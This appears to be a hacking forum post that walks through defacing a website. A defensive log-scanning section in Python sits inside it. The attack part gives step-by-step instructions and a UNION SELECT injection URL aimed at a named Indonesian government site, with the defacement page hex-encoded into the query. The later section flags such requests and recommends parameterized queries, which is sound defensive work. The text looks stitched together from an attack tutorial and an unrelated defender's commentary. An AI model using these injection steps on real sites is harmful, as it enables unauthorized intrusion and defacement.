#39 XSS Injection

You know XSS, right? XSS is changing something without it actually changing.

In this case you need an SQLi bug, whichever version, 4 or 5.

Actually this is a deception technique, but XSS is very useful for a fake page.

1. Prepare a target that is vulnerable to SQL injection, for example: http://www.unitkerja.palembang.go.id/depan/pertanian/home.php?modul=6&pid=-19+union+select+1–

2. The SQL bug is in the first UNION column, so in place of the number 1 we insert our defacement page code, already converted to hexadecimal at: http://tryer.t35.com/ascii.htm

red: what gets pasted into the URL
black: our defacement script

3. Don't forget to put 0x in front of where the number 1 was.

4. And the final result is:

http://www.unitkerja.palembang.go.id/depan/pertanian/home.php?modul=6&pid=-19+union+select+0x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–
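From the defender's side, the request shape the steps above produce (a negative value followed by UNION SELECT and a 0x hex literal, sitting in a parameter that should only ever be an integer) is easy to pick out of a web server access log. The following is an added example, not code from the post or from the site it mentions: it parses constructed access-log lines, flags non-integer values in parameters assumed to be numeric (`modul` and `pid`, names taken from the URL above), flags UNION SELECT, and decodes any 0x literal so an analyst can see the injected markup. The log lines, the `/home.php` path and the decoded `<h1>Hello</h1>` payload are all constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters this (hypothetical) application expects to be integers.
NUMERIC_PARAMS = {"modul", "pid"}

# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2010:13:55:36 +0700] "GET /home.php?modul=6&pid=19 HTTP/1.1" 200 5120
192.0.2.11 - - [10/Oct/2010:13:56:01 +0700] "GET /home.php?modul=6&pid=-19+union+select+1-- HTTP/1.1" 200 4102
192.0.2.11 - - [10/Oct/2010:13:57:12 +0700] "GET /home.php?modul=6&pid=-19+union+select+0x3c68313e48656c6c6f3c2f68313e-- HTTP/1.1" 200 4210
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"union\s+(?:all\s+)?select", re.IGNORECASE)
HEX_RE = re.compile(r"0x([0-9a-fA-F]+)")
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def decode_hex_literals(text):
    """Return the decoded form of every 0x... literal in text (odd-length literals are skipped)."""
    decoded = []
    for m in HEX_RE.finditer(text):
        digits = m.group(1)
        if len(digits) % 2:
            continue
        decoded.append(bytes.fromhex(digits).decode("utf-8", errors="replace"))
    return decoded


def analyze_request(target):
    """Inspect one request target (path?query).

    Returns (is_suspicious, reasons, decoded_payloads).
    """
    reasons = []
    payloads = []
    query = urlsplit(target).query
    # parse_qsl already percent-decodes and turns '+' into spaces.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", value):
            reasons.append(f"non-integer value in numeric parameter {name!r}")
        if UNION_RE.search(value):
            reasons.append(f"UNION SELECT in parameter {name!r}")
        for decoded in decode_hex_literals(value):
            payloads.append(decoded)
            if TAG_RE.search(decoded):
                reasons.append(f"hex literal in {name!r} decodes to HTML markup")
    return bool(reasons), reasons, payloads


def scan_log(log_text):
    """Run analyze_request over each access-log line; return findings for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        suspicious, reasons, payloads = analyze_request(m.group("target"))
        if suspicious:
            findings.append({"target": m.group("target"), "reasons": reasons, "payloads": payloads})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["target"])
        for reason in finding["reasons"]:
            print("  -", reason)
        for payload in finding["payloads"]:
            print("  decoded hex:", payload)
```

The decoded payload is what the vulnerable page would have rendered into its output, which is why the post calls the result an XSS fake page. The detection here is a triage aid; the actual fix on the application side is to cast `pid` to an integer (or use a parameterized query) before it reaches SQL, which makes the whole UNION trick impossible regardless of what is logged.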

Ichito-Bandito
